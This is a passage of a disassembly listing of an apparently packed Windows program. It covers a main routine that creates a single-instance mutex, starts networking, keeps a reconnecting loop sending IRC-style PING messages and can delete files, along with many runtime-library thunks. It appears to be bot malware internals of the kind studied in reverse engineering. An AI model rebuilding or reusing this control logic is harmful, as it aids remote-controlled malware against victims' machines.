push 1
pop eax
jmp short locret_41673D
; ---------------------------------------------------------------------------
loc_41673B: ; CODE XREF: sub_416711+1A�j
xor eax, eax
locret_41673D: ; CODE XREF: sub_416711+28�j
leave
retn
sub_416711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41673F proc near ; CODE XREF: sub_40A9CF+C23�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41679C
push 2
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_8], eax
push 0
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_8]
inc eax
neg eax
sbb eax, eax
and eax, [ebp+var_8]
jmp short locret_41679E
; ---------------------------------------------------------------------------
loc_41679C: ; CODE XREF: sub_41673F+1B�j
xor eax, eax
locret_41679E: ; CODE XREF: sub_41673F+5B�j
leave
retn
sub_41673F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167A0 proc near ; CODE XREF: sub_4167B9+13�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_4170AC ; DeleteFileA
test eax, eax
jz short loc_4167B5
push 1
pop eax
jmp short loc_4167B7
; ---------------------------------------------------------------------------
loc_4167B5: ; CODE XREF: sub_4167A0+E�j
xor eax, eax
loc_4167B7: ; CODE XREF: sub_4167A0+13�j
pop ebp
retn
sub_4167A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167B9 proc near ; CODE XREF: sub_402698+1D9�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416711
pop ecx
test eax, eax
jz short loc_4167D9
push [ebp+arg_0]
call sub_4167A0
pop ecx
neg eax
sbb eax, eax
inc eax
jmp short loc_4167DB
; ---------------------------------------------------------------------------
loc_4167D9: ; CODE XREF: sub_4167B9+E�j
xor eax, eax
loc_4167DB: ; CODE XREF: sub_4167B9+1E�j
pop ebp
retn
sub_4167B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167DD proc near ; CODE XREF: sub_40A9CF+8E9�p
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_4], eax
leave
retn
sub_4167DD endp
; ---------------------------------------------------------------------------
loc_4167F1: ; CODE XREF: UPX1:00421BF8�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417298
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 12DCh
call sub_416BC0
push ebx
push esi
push edi
mov [ebp-18h], esp
push 2
call ds:dword_4170F4 ; SetErrorMode
and dword ptr [ebp-4], 0
push ds:dword_41DB04
push ds:dword_41DB00
push 3B7h
push ds:dword_41DAFC
push 0
push ds:dword_41DAF8
push offset a08xX08x3x08x08 ; "%08x%x%08x%3x%08x%08x"
lea eax, [ebp-115Ch]
push eax
call sub_416B5E ; sprintf
add esp, 20h
and dword ptr [ebp-1128h], 0
jmp short loc_416875
; ---------------------------------------------------------------------------
loc_416868: ; CODE XREF: UPX0:loc_4168BA�j
mov eax, [ebp-1128h]
inc eax
mov [ebp-1128h], eax
loc_416875: ; CODE XREF: UPX0:00416866�j
cmp dword ptr [ebp-1128h], 0Ah
jnz short loc_416883
call sub_407148
loc_416883: ; CODE XREF: UPX0:0041687C�j
push 3E8h
call ds:dword_41709C ; Sleep
lea eax, [ebp-115Ch]
push eax
push 0
push 0
call ds:dword_4170F8 ; CreateMutexA
mov [ebp-12F0h], eax
cmp dword ptr [ebp-12F0h], 0
jz short loc_4168BA
call ds:dword_417064 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4168BA
jmp short loc_4168BC
; ---------------------------------------------------------------------------
loc_4168BA: ; CODE XREF: UPX0:004168AC�j
; UPX0:004168B6�j
jmp short loc_416868
; ---------------------------------------------------------------------------
loc_4168BC: ; CODE XREF: UPX0:004168B8�j
call sub_403BD3
call sub_405FA3
call sub_40938F
call sub_412FC6
call sub_4102AE
call sub_40E979
push 10h
push offset dword_41DAF8
call sub_41055F
pop ecx
pop ecx
push 10h
push offset dword_41DAF8
call sub_40ECEB
pop ecx
pop ecx
push 10h
push offset dword_41DAF8
call sub_40ED6E
pop ecx
pop ecx
call sub_410422
mov ds:dword_41ED00, eax
call sub_410422
mov ds:dword_41ED04, eax
call sub_410422
mov ds:dword_41ED08, eax
call sub_410422
mov ds:dword_41ED0C, eax
push 104h
lea eax, [ebp-1120h]
push eax
push 0
call ds:dword_41708C ; GetModuleHandleA
push eax
call ds:dword_417090 ; GetModuleFileNameA
test eax, eax
jnz short loc_416961
push offset byte_41DF00
push offset dword_41EBFC
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp loc_4169E1
; ---------------------------------------------------------------------------
loc_416961: ; CODE XREF: UPX0:00416949�j
lea eax, [ebp-1120h]
push eax
call sub_416B40 ; strlen
pop ecx
mov [ebp-12F4h], eax
jmp short loc_416983
; ---------------------------------------------------------------------------
loc_416976: ; CODE XREF: UPX0:loc_4169DF�j
mov eax, [ebp-12F4h]
dec eax
mov [ebp-12F4h], eax
loc_416983: ; CODE XREF: UPX0:00416974�j
cmp dword ptr [ebp-12F4h], 0
jnz short loc_41699F
push offset byte_41DF00
push offset dword_41EBFC
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_41699F: ; CODE XREF: UPX0:0041698A�j
mov eax, [ebp-12F4h]
movsx eax, byte ptr [ebp+eax-1121h]
cmp eax, 5Ch
jnz short loc_4169DF
mov eax, [ebp-12F4h]
lea eax, [ebp+eax-1120h]
push eax
push offset dword_41EBFC
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
push offset dword_41EBFC
push offset dword_41ED10
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
jmp short loc_4169E1
; ---------------------------------------------------------------------------
loc_4169DF: ; CODE XREF: UPX0:004169B0�j
jmp short loc_416976
; ---------------------------------------------------------------------------
loc_4169E1: ; CODE XREF: UPX0:0041695C�j
; UPX0:0041699D�j ...
call sub_406E8E
lea eax, [ebp-12ECh]
push eax
push 202h
call ds:dword_417264 ; WSAStartup
loc_4169F8: ; CODE XREF: UPX0:00416A43�j
; UPX0:00416AA7�j
push 0
push 0
push 0
call sub_40D366
add esp, 0Ch
call sub_409226
and dword ptr [ebp-1124h], 0
and dword ptr [ebp-101Ch], 0
loc_416A19: ; CODE XREF: UPX0:00416AE2�j
mov dword ptr [ebp-4], 1
loc_416A20: ; CODE XREF: UPX0:loc_416A6F�j
; UPX0:00416AC0�j
push 0EA60h
call sub_40CF25
push eax
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_416A71
cmp dword ptr [ebp-101Ch], 19h
jnz short loc_416A45
and dword ptr [ebp-4], 0
jmp short loc_4169F8
; ---------------------------------------------------------------------------
loc_416A45: ; CODE XREF: UPX0:00416A3D�j
cmp dword ptr [ebp-101Ch], 14h
jnz short loc_416A62
call sub_410422
push eax
push offset aPing08x ; "PING :%08X"
call sub_40D6CB
pop ecx
pop ecx
jmp short loc_416A6F
; ---------------------------------------------------------------------------
loc_416A62: ; CODE XREF: UPX0:00416A4C�j
mov eax, [ebp-101Ch]
inc eax
mov [ebp-101Ch], eax
loc_416A6F: ; CODE XREF: UPX0:00416A60�j
jmp short loc_416A20
; ---------------------------------------------------------------------------
loc_416A71: ; CODE XREF: UPX0:00416A34�j
push 1000h
lea eax, [ebp-1018h]
push eax
call sub_40CF25
push eax
call sub_4053DC
add esp, 0Ch
mov [ebp-1124h], eax
cmp dword ptr [ebp-1124h], 0
jz short loc_416AA3
cmp dword ptr [ebp-1124h], 0FFFFFFFFh
jnz short loc_416AAC
loc_416AA3: ; CODE XREF: UPX0:00416A98�j
and dword ptr [ebp-4], 0
jmp loc_4169F8
; ---------------------------------------------------------------------------
loc_416AAC: ; CODE XREF: UPX0:00416AA1�j
and dword ptr [ebp-101Ch], 0
lea eax, [ebp-1018h]
push eax
call sub_40E943
pop ecx
jmp loc_416A20
; ---------------------------------------------------------------------------
loc_416AC5: ; DATA XREF: UPX1:004172A8�o
push offset aLoop ; "loop"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
loc_416ADB: ; DATA XREF: UPX1:004172AC�o
mov esp, [ebp-18h]
and dword ptr [ebp-4], 0
jmp loc_416A19
; ---------------------------------------------------------------------------
push offset aEntry ; "entry"
push offset aMain ; "main"
push dword ptr [ebp-14h]
call sub_40332B
add esp, 0Ch
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
or dword ptr [ebp-4], 0FFFFFFFFh
cmp ds:dword_41DF08, 0
jz short loc_416B1E
push offset dword_41DE2C
push offset dword_41DB88
call sub_40D4AB
pop ecx
pop ecx
loc_416B1E: ; CODE XREF: UPX0:00416B0B�j
call ds:dword_417254 ; WSACleanup
push 0
call sub_416BFC ; exit
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B3A proc near ; CODE XREF: sub_401000+3C�p
; sub_4020C2+62�p ...
jmp ds:dword_41712C
sub_416B3A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B40 proc near ; CODE XREF: sub_401146+7A�p
; sub_4017AA+E�p ...
jmp ds:dword_4171BC
sub_416B40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B46 proc near ; CODE XREF: sub_401244+85�p
; sub_4017AA+22�p ...
jmp ds:dword_4171B8
sub_416B46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B4C proc near ; CODE XREF: sub_401244+25�p
; sub_401244+4DE�p ...
jmp ds:dword_4171B4
sub_416B4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B52 proc near ; CODE XREF: sub_401244+1A�p
; sub_401981+18�p ...
jmp ds:dword_4171B0
sub_416B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B58 proc near ; CODE XREF: sub_4017AA+5A�p
; sub_4024F3+88�p ...
jmp ds:dword_4171AC
sub_416B58 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B5E proc near ; CODE XREF: sub_4018AF+9F�p
; sub_4055E5+231�p ...
jmp ds:dword_4171A8
sub_416B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B64 proc near ; CODE XREF: sub_4018AF+3B�p
; sub_4018AF+5D�p ...
jmp ds:dword_4171A4
sub_416B64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B6A proc near ; CODE XREF: sub_401981+145�p
; sub_401981+158�p ...
jmp ds:dword_4171A0
sub_416B6A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B70 proc near ; CODE XREF: sub_401D6E+A5�p
; sub_403260+4C�p ...
jmp ds:dword_41719C
sub_416B70 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B76 proc near ; CODE XREF: sub_401E38+1AB�p
; sub_4020C2+1A6�p ...
jmp ds:dword_417198
sub_416B76 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B7C proc near ; CODE XREF: sub_401E38+179�p
; sub_402698+24C�p ...
jmp ds:dword_417194
sub_416B7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B82 proc near ; CODE XREF: sub_401E38+9D�p
; sub_401E38+262�p ...
jmp ds:dword_417190
sub_416B82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B88 proc near ; CODE XREF: sub_401E38+42�p
; sub_4020C2+159�p ...
jmp ds:dword_41718C
sub_416B88 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B90 proc near ; CODE XREF: sub_4020C2+2C1�p
; sub_41102F+94�p ...
jmp ds:dword_417188
sub_416B90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B96 proc near ; CODE XREF: sub_4020C2+198�p
; sub_4020C2+1BC�p ...
jmp ds:dword_417184
sub_416B96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416B9C proc near ; CODE XREF: sub_4024F3+26�p
; sub_4024F3+46�p ...
jmp ds:dword_417180
sub_416B9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA2 proc near ; CODE XREF: sub_402698+160�p
; sub_40CA29+F6�p ...
jmp ds:dword_41717C
sub_416BA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BA8 proc near ; CODE XREF: sub_402698+CC�p
; sub_402698+110�p ...
jmp ds:dword_417178
sub_416BA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BAE proc near ; CODE XREF: sub_402698+4B�p
; sub_4083AD+3DF�p ...
jmp ds:dword_417174
sub_416BAE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416BC0 proc near ; CODE XREF: sub_403DF3+8�p
; sub_40546E+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_416BE0
loc_416BCC: ; CODE XREF: sub_416BC0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_416BCC
loc_416BE0: ; CODE XREF: sub_416BC0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_416BC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF0 proc near ; CODE XREF: sub_4041B7+D�p
; sub_4041B7+28�p ...
jmp ds:dword_417170
sub_416BF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BF6 proc near ; CODE XREF: sub_406041+67�p
jmp ds:dword_41716C
sub_416BF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416BFC proc near ; CODE XREF: sub_406E8E+2B3�p
; UPX0:00416B26�p
jmp ds:dword_417168
sub_416BFC endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C10 proc near ; CODE XREF: sub_40821B+61�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_416C31
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov eax, [esp+4+arg_0]
div ecx
mov eax, edx
xor edx, edx
jmp short loc_416C81
; ---------------------------------------------------------------------------
loc_416C31: ; CODE XREF: sub_416C10+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_416C3F: ; CODE XREF: sub_416C10+39�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416C3F
div ebx
mov ecx, eax
mul [esp+4+arg_C]
xchg eax, ecx
mul [esp+4+arg_8]
add edx, ecx
jb short loc_416C6A
cmp edx, [esp+4+arg_4]
ja short loc_416C6A
jb short loc_416C72
cmp eax, [esp+4+arg_0]
jbe short loc_416C72
loc_416C6A: ; CODE XREF: sub_416C10+4A�j
; sub_416C10+50�j
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_416C72: ; CODE XREF: sub_416C10+52�j
; sub_416C10+58�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
loc_416C81: ; CODE XREF: sub_416C10+1F�j
pop ebx
retn 10h
sub_416C10 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C90 proc near ; CODE XREF: sub_40821B+30�p
; sub_40821B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_416CB2
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_416CF3
; ---------------------------------------------------------------------------
loc_416CB2: ; CODE XREF: sub_416C90+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_416CC0: ; CODE XREF: sub_416C90+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_416CC0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_416CEE
cmp edx, [esp+8+arg_4]
ja short loc_416CEE
jb short loc_416CEF
cmp eax, [esp+8+arg_0]
jbe short loc_416CEF
loc_416CEE: ; CODE XREF: sub_416C90+4E�j
; sub_416C90+54�j
dec esi
loc_416CEF: ; CODE XREF: sub_416C90+56�j
; sub_416C90+5C�j
xor edx, edx
mov eax, esi
loc_416CF3: ; CODE XREF: sub_416C90+20�j
pop esi
pop ebx
retn 10h
sub_416C90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CF8 proc near ; CODE XREF: sub_4088FC+1FA�p
; sub_409226+5C�p ...
jmp ds:dword_417164
sub_416CF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416CFE proc near ; CODE XREF: sub_409226+55�p
; sub_4092A4+55�p ...
jmp ds:dword_417160
sub_416CFE endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416D10 proc near ; CODE XREF: sub_409226+42�p
; sub_4092A4+42�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_416D31
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_416D31: ; CODE XREF: sub_416D10+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_416D4D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_416D4D: ; CODE XREF: sub_416D10+27�j
or eax, eax
jnz short loc_416D69
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_416DAA
; ---------------------------------------------------------------------------
loc_416D69: ; CODE XREF: sub_416D10+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_416D77: ; CODE XREF: sub_416D10+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_416D77
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_416DA5
cmp edx, [esp+0Ch+arg_4]
ja short loc_416DA5
jb short loc_416DA6
cmp eax, [esp+0Ch+arg_0]
jbe short loc_416DA6
loc_416DA5: ; CODE XREF: sub_416D10+85�j
; sub_416D10+8B�j
dec esi
loc_416DA6: ; CODE XREF: sub_416D10+8D�j
; sub_416D10+93�j
xor edx, edx
mov eax, esi
loc_416DAA: ; CODE XREF: sub_416D10+57�j
dec edi
jnz short loc_416DB4
neg edx
neg eax
sbb edx, 0
loc_416DB4: ; CODE XREF: sub_416D10+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_416D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DBA proc near ; DATA XREF: sub_4093B6+A�o
; sub_4094E6+A�o ...
jmp ds:dword_41715C
sub_416DBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC0 proc near ; CODE XREF: sub_409479+41�p
; sub_4095A4+162�p
jmp ds:dword_417158
sub_416DC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DC6 proc near ; CODE XREF: sub_4095A4+11B�p
jmp ds:dword_417154
sub_416DC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DCC proc near ; CODE XREF: sub_409CB1+105�p
; sub_409CB1+114�p ...
jmp ds:dword_417150
sub_416DCC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD2 proc near ; CODE XREF: sub_409CB1+42�p
; sub_409CB1+88�p
jmp ds:dword_41714C
sub_416DD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DD8 proc near ; CODE XREF: sub_409CB1+1A�p
; sub_409DD0+13B�p
jmp ds:dword_417148
sub_416DD8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DDE proc near ; CODE XREF: sub_40A2D2+13E�p
; sub_40A9CF+1F6�p ...
jmp ds:dword_417144
sub_416DDE endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DE4 proc near ; CODE XREF: sub_40A8AD+90�p
jmp ds:dword_417140
sub_416DE4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DEA proc near ; CODE XREF: sub_40A9CF+185C�p
jmp ds:dword_41713C
sub_416DEA endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF0 proc near ; CODE XREF: sub_40D420+47�p
; sub_40D4AB+50�p ...
jmp ds:dword_417138
sub_416DF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DF6 proc near ; CODE XREF: sub_40EF59+6B�p
; sub_40EF59+C1�p
jmp ds:dword_417134
sub_416DF6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416DFC proc near ; CODE XREF: sub_40F040+52�p
; sub_40F040+A8�p
jmp ds:dword_417130
sub_416DFC endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E02 proc near ; CODE XREF: sub_40F040+1E�p
jmp ds:dword_417128
sub_416E02 endp
; ---------------------------------------------------------------------------
loc_416E08: ; CODE XREF: UPX0:00416FE2�j
jmp ds:dword_417124
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416E10 proc near ; CODE XREF: sub_414EF4+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_416E10 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416E30 proc near ; CODE XREF: sub_4048EF+4E�p
; sub_4048EF+2CF�p ...
jmp ds:dword_4171F8
sub_416E30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416E40 proc near ; CODE XREF: sub_414EF4+EA�p
; sub_414EF4+1E2�p ...
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_416EAF
retn 4
sub_416E40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E4E proc near ; CODE XREF: sub_414EF4+134�p
; sub_414EF4+2D8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
and [ebp+var_4], 0
test eax, eax
jz short loc_416EA0
mov ecx, [eax]
lea edx, [ebp+arg_4]
push edx
push offset dword_41DEA0
push eax
call dword ptr [ecx]
test eax, eax
jl short loc_416EA0
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
mov ecx, [eax]
push eax
call dword ptr [ecx+0Ch]
mov esi, eax
mov eax, [ebp+arg_4]
push eax
mov ecx, [eax]
call dword ptr [ecx+8]
test esi, esi
pop esi
jnz short loc_416EA0
lea eax, [ebp+var_4]
push eax
push 0
call ds:dword_4171C8
test eax, eax
jz short loc_416EA0
and [ebp+var_4], 0
loc_416EA0: ; CODE XREF: sub_416E4E+D�j
; sub_416E4E+1F�j ...
push [ebp+var_4]
push [ebp+arg_0]
call sub_416EAF
leave
retn 0Ch
sub_416E4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416EAF proc near ; CODE XREF: sub_416E40+6�p
; sub_416E4E+58�p
var_10 = byte ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
lea ecx, [ebp+var_10]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_416ED3
lea eax, [ebp+var_10]
push offset dword_4173B8
push eax
call sub_416FA2 ; _CxxThrowException
sub_416EAF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_416ED3 proc near ; CODE XREF: sub_416EAF+11�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov eax, [esp+arg_0]
push esi
mov esi, ecx
and dword ptr [esi+0Ch], 0
mov [esi+4], eax
mov eax, [esp+4+arg_4]
mov dword ptr [esi], offset off_4172B4
test eax, eax
mov [esi+8], eax
jz short loc_416EFF
cmp [esp+4+arg_8], 0
jz short loc_416EFF
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416EFF: ; CODE XREF: sub_416ED3+1D�j
; sub_416ED3+24�j
mov eax, esi
pop esi
retn 0Ch
sub_416ED3 endp
; =============== S U B R O U T I N E =======================================
sub_416F05 proc near ; DATA XREF: UPX1:off_4172B4�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_416F4E
test [esp+4+arg_0], 1
jz short loc_416F1B
push esi
call sub_416DCC ; ??3@YAXPAX@Z
pop ecx
loc_416F1B: ; CODE XREF: sub_416F05+D�j
mov eax, esi
pop esi
retn 4
sub_416F05 endp
; ---------------------------------------------------------------------------
mov eax, [esp+4]
push esi
mov esi, ecx
mov ecx, [eax+4]
mov [esi+4], ecx
mov eax, [eax+8]
and dword ptr [esi+0Ch], 0
mov [esi+8], eax
test eax, eax
mov dword ptr [esi], offset off_4172B4
jz short loc_416F48
mov ecx, [eax]
push eax
call dword ptr [ecx+4]
loc_416F48: ; CODE XREF: UPX0:00416F40�j
mov eax, esi
pop esi
retn 4
; =============== S U B R O U T I N E =======================================
sub_416F4E proc near ; CODE XREF: sub_416F05+3�p
; DATA XREF: UPX1:004173BC�o
push esi
mov esi, ecx
mov eax, [esi+8]
mov dword ptr [esi], offset off_4172B4
test eax, eax
jz short loc_416F64
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_416F64: ; CODE XREF: sub_416F4E+E�j
mov esi, [esi+0Ch]
test esi, esi
jz short loc_416F72
push esi
call ds:dword_4170B0 ; LocalFree
loc_416F72: ; CODE XREF: sub_416F4E+1B�j
pop esi
retn
sub_416F4E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F74 proc near ; CODE XREF: sub_401244+120�p
; sub_406E8E+DA�p ...
jmp ds:dword_4171C0
sub_416F74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F7A proc near ; CODE XREF: sub_4020C2+113�p
; sub_4038BA+22F�p ...
jmp ds:dword_417114
sub_416F7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416F80 proc near ; CODE XREF: sub_402A32+CC�p
; sub_402A32+2B9�p ...
jmp ds:dword_417118
sub_416F80 endp
; =============== S U B R O U T I N E =======================================
sub_416F86 proc near ; DATA XREF: UPX1:off_4172BC�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_416FA8 ; ??1type_info@@UAE@XZ
test [esp+4+arg_0], 1
jz short loc_416F9C
push esi
call sub_416DCC ; ??3@YAXPAX@Z
pop ecx
loc_416F9C: ; CODE XREF: sub_416F86+D�j
mov eax, esi
pop esi
retn 4
sub_416F86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA2 proc near ; CODE XREF: sub_416EAF+1F�p
jmp ds:dword_41711C
sub_416FA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_416FA8 proc near ; CODE XREF: sub_416F86+3�p
jmp ds:dword_417120
sub_416FA8 endp
; ---------------------------------------------------------------------------
align 10h
lea ecx, [ebp-0A00h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
loc_416FBC: ; DATA XREF: UPX1:0041737C�o
lea ecx, [ebp-10h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-0DF8h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
lea ecx, [ebp-0E14h]
call sub_415B3F
retn
; ---------------------------------------------------------------------------
